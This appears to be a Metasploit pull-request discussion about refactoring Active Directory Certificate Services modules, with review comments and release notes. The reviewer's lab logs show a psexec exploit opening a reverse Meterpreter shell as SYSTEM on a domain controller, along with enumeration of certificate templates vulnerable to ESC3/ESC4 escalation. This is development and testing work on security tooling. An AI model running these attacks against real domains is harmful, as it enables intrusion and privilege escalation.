AD CS Workflow Related Changes

[zeroSteiner]

This makes changes to a few modules to enable them to be used as part of larger workflow automation. For all three modules, it adds a return value to indicate that the operation was successful and include some relevant information.

Most of the changes are to the ldap_esc_vulnerable_cert_finder module. The changes include:

• Many LDAP objects are now cached in an @ldap_objects array. This means that repeated lookups for objects by samAccountName, objectSid, etc. can return the same object. This results in a noticeable reduction in LDAP queries to the server.
• Added a #build_certificate_details method to consolidate the collection of information about certificate templates. This makes it easier in the future to add additional data points without needing to update multiple methods.
• All certificates are queried initially so common attributes of them are stored with #build_certificate_details. This ensures that all certificates are returned with common information, regardless of their vulnerability status.
• DNS records are looked up from LDAP to avoid crashing in instances where the DNS hostname of the CA server can not be resolved by Metasploits running configuration. This would be the case when a DC is targeted without the ability to resolve addresses within its domain.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• For each of the modules, use them and see that the results are still the same

[jheysel-r7]

Great additions/ refactoring @zeroSteiner.

I verified that the actions in ad_cs_cert_template produce the same results as before this change and that the get_ticket module still produces valid, usable tickets.

There were a couple differences noticed when testing the ldap_esc_vulnerable_cert_finder. Now when a cert is only vulnerable to ESC4 the module correctly lists the Required Signatures attribute as it did not before, an improvement stemming from build_certificate_details/ the standardization of certificate templates in the module.

The other two minor differences are listed below.

[jheysel-r7]

certificate_write_priv_sids was refactored (good call) - it's now being stored in the hash as write_sids but here the module is checking for and attempting to print write_enabled_sids which is currently empty.

[jheysel-r7]

Changes to the FQDN look up looks good 👍 One more small suggestion.

[jheysel-r7]

Get ticket module working as expected:

msf6 auxiliary(admin/kerberos/get_ticket) > run domain=kerberos.issue rhost=172.16.199.200 username=administrator password=N0tpassword!
[*] Running module against 172.16.199.200
[*] 172.16.199.200:88 - Getting TGT for administrator@kerberos.issue
[+] 172.16.199.200:88 - Received a valid TGT-Response
[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250131143855_default_172.16.199.200_mit.kerberos.cca_540876.bin
[*] Auxiliary module execution completed

msf6 exploit(windows/smb/psexec) > run rhosts=172.16.199.200 smbuser=administrator smbdomain=kerberos.issue SMB::Auth=kerberos smb::rhostname=dc2.kerberos.issue
[*] Started reverse TCP handler on 192.168.1.65:4444
[*] 172.16.199.200:445 - Connecting to the server...
[*] 172.16.199.200:445 - Authenticating to 172.16.199.200:445|kerberos.issue as user 'administrator'...
[*] 172.16.199.200:445 - Using cached credential for krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE Administrator@KERBEROS.ISSUE
[*] 172.16.199.200:445 - Using KDC dc2.kerberos.issue for realm kerberos.issue
[+] 172.16.199.200:445 - dc2.kerberos.issue:88 - Received a valid TGS-Response
[*] 172.16.199.200:445 - 172.16.199.200:445 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250131143933_default_172.16.199.200_mit.kerberos.cca_840179.bin
[+] 172.16.199.200:445 - dc2.kerberos.issue:88 - Received a valid delegation TGS-Response
[*] 172.16.199.200:445 - Executing the payload...
[+] 172.16.199.200:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (177734 bytes) to 192.168.1.65
[*] Meterpreter session 1 opened (192.168.1.65:4444 -> 192.168.1.65:64415) at 2025-01-31 14:39:41 -0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC2
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : KERBEROS
Logged On Users : 9
Meterpreter     : x86/windows
meterpreter >

AD CS Certificate Template Management module working as expected:

msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run domain=demo.local password=N0tpassword! username=Administrator rhost=172.16.199.100
[*] Running module against 172.16.199.100
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*] Certificate template data written to: /Users/jheysel/.msf4/loot/20250131144201_default_172.16.199.100_windows.ad.cs.te_038079.json
[*] Certificate Template:
[*]   distinguishedName: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   displayName:       User
[*]   objectGUID:        23b19584-4b39-4fd3-a115-9706478ef46d
[*]   msPKI-Certificate-Name-Flag: 0xa6000000
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_UPN
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
[*]   msPKI-Enrollment-Flag: 0x00000029
[*]     * CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS
[*]     * CT_FLAG_PUBLISH_TO_DS
[*]     * CT_FLAG_AUTO_ENROLLMENT
[*]   msPKI-Private-Key-Flag: 0x00000010
[*]     * CT_FLAG_EXPORTABLE_KEY
[*]   msPKI-RA-Signature: 0x00000000
[*]   msPKI-Template-Schema-Version: 1
[*]   pKIKeyUsage: 0x00000000
[*]   pKIExtendedKeyUsage:
[*]     * 1.3.6.1.4.1.311.10.3.4 (Encrypting File System)
[*]     * 1.3.6.1.5.5.7.3.4 (Secure Email)
[*]     * 1.3.6.1.5.5.7.3.2 (Client Authentication)
[*]   pKIMaxIssuingDepth: 0
[+] The operation completed successfully!
[*] Auxiliary module execution completed

Misconfigured Certificate Template Finder module working as expected:

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run domain=demo.local username=Administrator password=N0tpassword! rhost=172.16.199.100
[*] Running module against 172.16.199.100
[*] Discovering base DN automatically
[!] Couldn't find any vulnerable ESC13 templates!
[!] No IP addresses were found for dc1.demo.local via DNS.
[+] Template: Copy of Authenticated Session
[*]   Distinguished Name: CN=Copy of Authenticated Session,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC4
[*]   Notes:
[*]     * ESC4: The account: Administrator has edit permissions over the template Copy of Authenticated Session making it vulnerable to ESC4
[*]     * ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-500 (Administrator)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-3380 (ANNABELLE_RAMSEY)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-513 (Domain Users)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-3380 (ANNABELLE_RAMSEY)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: Copy of Basic EFS
[*]   Distinguished Name: CN=Copy of Basic EFS,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC4
[*]   Notes:
[*]     * ESC4: The account: Administrator has edit permissions over the template Copy of Basic EFS making it vulnerable to ESC4
[*]     * ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-3350 (DANIAL_BARKER)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-500 (Administrator)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-3350 (DANIAL_BARKER)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-513 (Domain Users)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: Copy of CEP Encryption
[*]   Distinguished Name: CN=Copy of CEP Encryption,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC3, ESC4
[*]   Notes:
[*]     * ESC3: Template defines the Certificate Request Agent OID (PkiExtendedKeyUsage)
[*]     * ESC4: The account: Administrator has edit permissions over the template Copy of CEP Encryption making it vulnerable to ESC4
[*]     * ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-500 (Administrator)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-1516 (BETHANY_GAY)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-1516 (BETHANY_GAY)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: Copy of Code Signing
[*]   Distinguished Name: CN=Copy of Code Signing,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC4
[*]   Notes:
[*]     * ESC4: The account: Administrator has edit permissions over the template Copy of Code Signing making it vulnerable to ESC4
[*]     * ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-500 (Administrator)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-3165 (STEPHAN_MOSLEY)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-3165 (STEPHAN_MOSLEY)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: Copy of Computer
[*]   Distinguished Name: CN=Copy of Computer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC4
[*]   Notes:
[*]     * ESC4: The account: Administrator has edit permissions over the template Copy of Computer making it vulnerable to ESC4
[*]     * ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins, Authenticated Users) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-500 (Administrator)
[*]     * S-1-5-11 (Authenticated Users)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-515 (Domain Computers)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-11 (Authenticated Users)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: EFS
[*]   Distinguished Name: CN=EFS,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC4
[*]   Notes: ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-513 (Domain Users)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: Machine
[*]   Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC3_TEMPLATE_2, ESC4
[*]   Notes: ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-515 (Domain Computers)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: User
[*]   Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC3_TEMPLATE_2, ESC4
[*]   Notes: ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-513 (Domain Users)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*] Auxiliary module execution completed

[jheysel-r7]

Release Notes

This makes changes to the ldap_esc_vulnerable_cert_finder, ad_cs_cert_template and get_ticket modules to enable them to be used as part of larger workflow automation. For all three modules, it adds a return value to indicate that the operation was successful and include some relevant information. LDAP object caching has been introduced reduce the number of queries sent to the target. A #build_certificate_details method to consolidate the collection of information about certificate templates. This ensures that all certificates are returned with common information, regardless of their vulnerability status. DNS records are looked up from LDAP to avoid crashing in instances where the DNS hostname of the CA server can not be resolved by Metasploit's running configuration. This would be the case when a DC is targeted without the ability to resolve addresses within its domain.